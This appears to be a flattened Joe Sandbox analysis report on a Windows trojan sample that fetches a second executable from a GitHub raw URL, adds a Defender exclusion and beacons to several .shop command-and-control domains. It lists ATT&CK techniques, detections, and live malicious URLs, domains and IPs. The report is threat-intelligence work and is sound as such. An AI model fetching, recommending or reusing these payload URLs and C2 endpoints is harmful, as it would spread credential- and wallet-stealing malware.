                Source: C:\FkSpRTrp\jyidkjkfhjawd.exeDirectory queried: C:\Users\user\Documents\ONBQCLYSPUJump to behavior
                Source: Yara matchFile source: 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1861189025.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1861666105.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1874370927.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: jyidkjkfhjawd.exe PID: 7940, type: MEMORYSTR

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: Process Memory Space: jyidkjkfhjawd.exe PID: 7940, type: MEMORYSTR
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                Windows Management Instrumentation
                1
                DLL Side-Loading
                11
                Process Injection
                1
                Masquerading
                2
                OS Credential Dumping
                1
                Query Registry
                Remote Services1
                Archive Collected Data
                11
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                PowerShell
                Boot or Logon Initialization Scripts1
                DLL Side-Loading
                11
                Disable or Modify Tools
                LSASS Memory321
                Security Software Discovery
                Remote Desktop Protocol41
                Data from Local System
                1
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)331
                Virtualization/Sandbox Evasion
                Security Account Manager1
                Process Discovery
                SMB/Windows Admin SharesData from Network Shared Drive3
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
                Process Injection
                NTDS331
                Virtualization/Sandbox Evasion
                Distributed Component Object ModelInput Capture114
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets1
                Application Window Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
                Obfuscated Files or Information
                Cached Domain Credentials12
                File and Directory Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
                Software Packing
                DCSync32
                System Information Discovery
                Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                Timestomp
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1582366 Sample: eXbhgU9.exe Startdate: 30/12/2024 Architecture: WINDOWS Score: 100 31 framekgirus.shop 2->31 33 raw.githubusercontent.com 2->33 35 github.com 2->35 43 Suricata IDS alerts for network traffic 2->43 45 Found malware configuration 2->45 47 Antivirus detection for URL or domain 2->47 49 9 other signatures 2->49 8 eXbhgU9.exe 15 7 2->8         started        signatures3 process4 dnsIp5 37 github.com 140.82.121.4, 443, 49730 GITHUBUS United States 8->37 39 raw.githubusercontent.com 185.199.110.133, 443, 49731 FASTLYUS Netherlands 8->39 27 C:\FkSpRTrp\jyidkjkfhjawd.exe, PE32 8->27 dropped 29 C:\Users\user\AppData\...\eXbhgU9.exe.log, CSV 8->29 dropped 51 Adds a directory exclusion to Windows Defender 8->51 13 jyidkjkfhjawd.exe 8->13         started        17 powershell.exe 23 8->17         started        19 powershell.exe 23 8->19         started        21 conhost.exe 8->21         started        file6 signatures7 process8 dnsIp9 41 framekgirus.shop 104.21.18.19, 443, 49732, 49733 CLOUDFLARENETUS United States 13->41 53 Antivirus detection for dropped file 13->53 55 Detected unpacking (changes PE section rights) 13->55 57 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 13->57 63 7 other signatures 13->63 59 Found many strings related to Crypto-Wallets (likely being stolen) 17->59 61 Loading BitLocker PowerShell Module 17->61 23 conhost.exe 17->23         started        25 conhost.exe 19->25         started        signatures10 process11

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                eXbhgU9.exe13%ReversingLabsByteCode-MSIL.Trojan.Zilla
                eXbhgU9.exe23%VirustotalBrowse
                eXbhgU9.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\FkSpRTrp\jyidkjkfhjawd.exe100%AviraHEUR/AGEN.1314134
                C:\FkSpRTrp\jyidkjkfhjawd.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.enigmaprotector.com/openU0%Avira URL Cloudsafe
                https://framekgirus.shop:443/apitxtPK100%Avira URL Cloudmalware
                https://framekgirus.shop:443/apiD100%Avira URL Cloudmalware
                https://framekgirus.shop/api100%Avira URL Cloudmalware
                https://framekgirus.shop/Vg100%Avira URL Cloudmalware
                https://framekgirus.shop/api7100%Avira URL Cloudmalware
                https://framekgirus.shop/R5J100%Avira URL Cloudmalware
                https://framekgirus.shop/B5100%Avira URL Cloudmalware
                https://framekgirus.shop/j5B100%Avira URL Cloudmalware
                https://framekgirus.shop/api_100%Avira URL Cloudmalware
                https://framekgirus.shop/25100%Avira URL Cloudmalware
                https://framekgirus.shop/s100%Avira URL Cloudmalware
                https://framekgirus.shop/z5R100%Avira URL Cloudmalware
                https://framekgirus.shop:443/api100%Avira URL Cloudmalware
                abruptyopsn.shoph0%Avira URL Cloudsafe
                rabidcowse.shop100%Avira URL Cloudmalware
                https://framekgirus.shop/h100%Avira URL Cloudmalware
                wholersorie.shop100%Avira URL Cloudmalware
                https://framekgirus.shop/Y100%Avira URL Cloudmalware
                cloudewahsj.shop100%Avira URL Cloudmalware
                nearycrepso.shop100%Avira URL Cloudmalware
                https://framekgirus.shop:443/apin.txtPK100%Avira URL Cloudmalware
                noisycuttej.shop100%Avira URL Cloudmalware
                http://www.enigmaprotector.com/0%Avira URL Cloudsafe
                https://framekgirus.shop/100%Avira URL Cloudmalware
                tirepublicerj.shop100%Avira URL Cloudmalware
                framekgirus.shop100%Avira URL Cloudmalware
                abruptyopsn.shop100%Avira URL Cloudmalware
                NameIPActiveMaliciousAntivirus DetectionReputation
                github.com
                140.82.121.4
                truefalse
                  high
                  raw.githubusercontent.com
                  185.199.110.133
                  truefalse
                    high
                    framekgirus.shop
                    104.21.18.19
                    truetrue
                      unknown
                      NameMaliciousAntivirus DetectionReputation
                      https://framekgirus.shop/apitrue
                      • Avira URL Cloud: malware
                      unknown
                      abruptyopsn.shophtrue
                      • Avira URL Cloud: safe
                      unknown
                      rabidcowse.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      wholersorie.shoptrue
                      • Avira URL Cloud: malware
                      unknown
                      https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exefalse
                        high
                        cloudewahsj.shoptrue
                        • Avira URL Cloud: malware
                        unknown
                        noisycuttej.shoptrue
                        • Avira URL Cloud: malware
                        unknown
                        nearycrepso.shoptrue
                        • Avira URL Cloud: malware
                        unknown
                        https://raw.githubusercontent.com/arizaseeen/ariiiza/refs/heads/main/jyidkjkfhjawd.exefalse
                          high
                          framekgirus.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          tirepublicerj.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          abruptyopsn.shoptrue
                          • Avira URL Cloud: malware
                          unknown
                          NameSourceMaliciousAntivirus DetectionReputation
                          https://duckduckgo.com/chrome_newtabjyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            https://duckduckgo.com/ac/?q=jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              https://framekgirus.shop:443/apiDjyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878598429.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                              • Avira URL Cloud: malware
                              unknown
                              http://crl.microsoftjyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001427000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860623456.000000000141A000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035408285.000000000142A000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.000000000141A000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001418000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://framekgirus.shop/api7jyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                • Avira URL Cloud: malware
                                unknown
                                https://github.comeXbhgU9.exe, 00000000.00000002.1816600070.0000000002704000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://framekgirus.shop/B5jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: malware
                                  unknown
                                  http://www.enigmaprotector.com/openUjyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://contoso.com/Licensepowershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://framekgirus.shop/R5Jjyidkjkfhjawd.exe, 00000007.00000003.1877546668.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878429247.0000000001445000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://framekgirus.shop:443/apitxtPKjyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    unknown
                                    https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004333000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1849507128.00000000042E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://github.comeXbhgU9.exe, 00000000.00000002.1816600070.0000000002717000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          https://framekgirus.shop/j5Bjyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpfalse
                                          • Avira URL Cloud: malware
                                          unknown
                                          https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe-DownloadingeXbhgU9.exefalse
                                            high
                                            https://framekgirus.shop/Vgjyidkjkfhjawd.exe, 00000007.00000003.1835357420.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835525897.00000000013F0000.00000004.00000020.00020000.00000000.sdmpfalse
                                            • Avira URL Cloud: malware
                                            unknown
                                            http://x1.c.lencr.org/0jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                              high
                                              http://x1.i.lencr.org/0jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Installjyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchjyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    https://contoso.com/powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      https://nuget.org/nuget.exepowershell.exe, 00000002.00000002.1705067078.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        https://framekgirus.shop/api_jyidkjkfhjawd.exe, 00000007.00000003.1860268247.0000000001436000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://framekgirus.shop:443/apijyidkjkfhjawd.exe, 00000007.00000003.1877860418.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1878598429.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1835084854.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2010143027.00000000013BB000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2000292819.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                        • Avira URL Cloud: malware
                                                        unknown
                                                        https://support.mozilla.org/products/firefoxgro.alljyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameeXbhgU9.exe, 00000000.00000002.1816600070.0000000002691000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1702719661.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            https://framekgirus.shop/25jyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://framekgirus.shop/sjyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            https://framekgirus.shop/z5Rjyidkjkfhjawd.exe, 00000007.00000003.2000269723.0000000001441000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: malware
                                                            unknown
                                                            http://nuget.org/NuGet.exepowershell.exe, 00000002.00000002.1705067078.00000000054EC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              https://framekgirus.shop/hjyidkjkfhjawd.exe, 00000007.00000003.2034641430.000000000144E000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.2034541517.0000000001444000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000002.2035445333.000000000144F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              • Avira URL Cloud: malware
                                                              unknown
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.icojyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000002.00000002.1702719661.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://raw.githubusercontent.comdeXbhgU9.exe, 00000000.00000002.1816600070.000000000275C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        https://contoso.com/Iconpowershell.exe, 00000005.00000002.1737406894.0000000005F4D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://crl.rootca1.amazontrust.com/rootca1.crl0jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              https://aka.ms/pscore6lBkqpowershell.exe, 00000002.00000002.1702719661.0000000004481000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000004EE1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://github.comdeXbhgU9.exe, 00000000.00000002.1816600070.0000000002717000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  http://ocsp.rootca1.amazontrust.com0:jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    high
                                                                                    https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016jyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042E7000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004333000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1849507128.00000000042E7000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      high
                                                                                      https://framekgirus.shop/Yjyidkjkfhjawd.exe, 00000007.00000003.1874194613.0000000001434000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • Avira URL Cloud: malware
                                                                                      unknown
                                                                                      https://www.ecosia.org/newtab/jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-brjyidkjkfhjawd.exe, 00000007.00000003.1862690282.00000000045BC000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://github.com/Pester/Pesterpowershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            http://crl.mipowershell.exe, 00000005.00000002.1742641026.00000000077E4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://github.com/arizaseeen/ariiiza/raw/refs/heads/main/jyidkjkfhjawd.exe...eXbhgU9.exe, 00000000.00000002.1816600070.000000000269C000.00000004.00000800.00020000.00000000.sdmp, ConDrv.0.drfalse
                                                                                                high
                                                                                                https://ac.ecosia.org/autocomplete?q=jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://raw.githubusercontent.comeXbhgU9.exe, 00000000.00000002.1816600070.0000000002742000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://support.microsofjyidkjkfhjawd.exe, 00000007.00000003.1838585655.0000000004335000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000002.00000002.1702719661.00000000045D5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1728016132.0000000005035000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        http://crt.rootca1.amazontrust.com/rootca1.cer0?jyidkjkfhjawd.exe, 00000007.00000003.1861493123.00000000042D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                          high
                                                                                                          http://raw.githubusercontent.comeXbhgU9.exe, 00000000.00000002.1816600070.000000000275C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                            high
                                                                                                            https://framekgirus.shop:443/apin.txtPKjyidkjkfhjawd.exe, 00000007.00000002.2035303322.00000000013BB000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://framekgirus.shop/jyidkjkfhjawd.exe, 00000007.00000002.2035357975.00000000013DE000.00000004.00000020.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1860623456.0000000001436000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            • Avira URL Cloud: malware
                                                                                                            unknown
                                                                                                            https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examplesjyidkjkfhjawd.exe, 00000007.00000003.1839032040.00000000042C2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://www.enigmaprotector.com/jyidkjkfhjawd.exe, 00000007.00000002.2034770588.0000000000B03000.00000040.00000001.01000000.00000008.sdmpfalse
                                                                                                              • Avira URL Cloud: safe
                                                                                                              unknown
                                                                                                              https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=jyidkjkfhjawd.exe, 00000007.00000003.1837628332.00000000042DB000.00000004.00000800.00020000.00000000.sdmp, jyidkjkfhjawd.exe, 00000007.00000003.1837848299.00000000042D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                • No. of IPs < 25%
                                                                                                                • 25% < No. of IPs < 50%
                                                                                                                • 50% < No. of IPs < 75%
                                                                                                                • 75% < No. of IPs
                                                                                                                IPDomainCountryFlagASNASN NameMalicious
                                                                                                                104.21.18.19
                                                                                                                framekgirus.shopUnited States
                                                                                                                13335CLOUDFLARENETUStrue
                                                                                                                140.82.121.4
                                                                                                                github.comUnited States
                                                                                                                36459GITHUBUSfalse
                                                                                                                185.199.110.133
                                                                                                                raw.githubusercontent.comNetherlands
                                                                                                                54113FASTLYUSfalse
                                                                                                                Joe Sandbox version:41.0.0 Charoite
                                                                                                                Analysis ID:1582366
                                                                                                                Start date and time:2024-12-30 11:58:32 +01:00
                                                                                                                Joe Sandbox product:CloudBasic
                                                                                                                Overall analysis duration:0h 6m 8s
                                                                                                                Hypervisor based Inspection enabled:false
                                                                                                                Report type:full
                                                                                                                Cookbook file name:default.jbs
                                                                                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                Number of analysed new started processes analysed:12
                                                                                                                Number of new started drivers analysed:0
                                                                                                                Number of existing processes analysed:0
                                                                                                                Number of existing drivers analysed:0
                                                                                                                Number of injected processes analysed:0
                                                                                                                Technologies:
                                                                                                                • HCA enabled
                                                                                                                • EGA enabled
                                                                                                                • AMSI enabled
                                                                                                                Analysis Mode:default
                                                                                                                Analysis stop reason:Timeout
                                                                                                                Sample name:eXbhgU9.exe
                                                                                                                Detection:MAL
                                                                                                                Classification:mal100.troj.spyw.evad.winEXE@10/12@3/3
                                                                                                                EGA Information:
                                                                                                                • Successful, ratio: 75%
                                                                                                                HCA Information:
                                                                                                                • Successful, ratio: 71%
                                                                                                                • Number of executed functions: 165
                                                                                                                • Number of non-executed functions: 28
                                                                                                                Cookbook Comments:
                                                                                                                • Found application associated with file extension: .exe
                                                                                                                • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                                • Excluded IPs from analysis (whitelisted): 52.149.20.212, 4.245.163.56, 13.107.246.45
                                                                                                                • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                • Execution Graph export aborted for target powershell.exe, PID 7660 because it is empty
                                                                                                                • Not all processes where analyzed, report is missing behavior information
                                                                                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                TimeTypeDescription
                                                                                                                05:59:24API Interceptor21x Sleep call for process: powershell.exe modified
                                                                                                                05:59:34API Interceptor31x Sleep call for process: eXbhgU9.exe modified
                                                                                                                05:59:38API Interceptor8x Sleep call for process: jyidkjkfhjawd.exe modified
                                                                                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
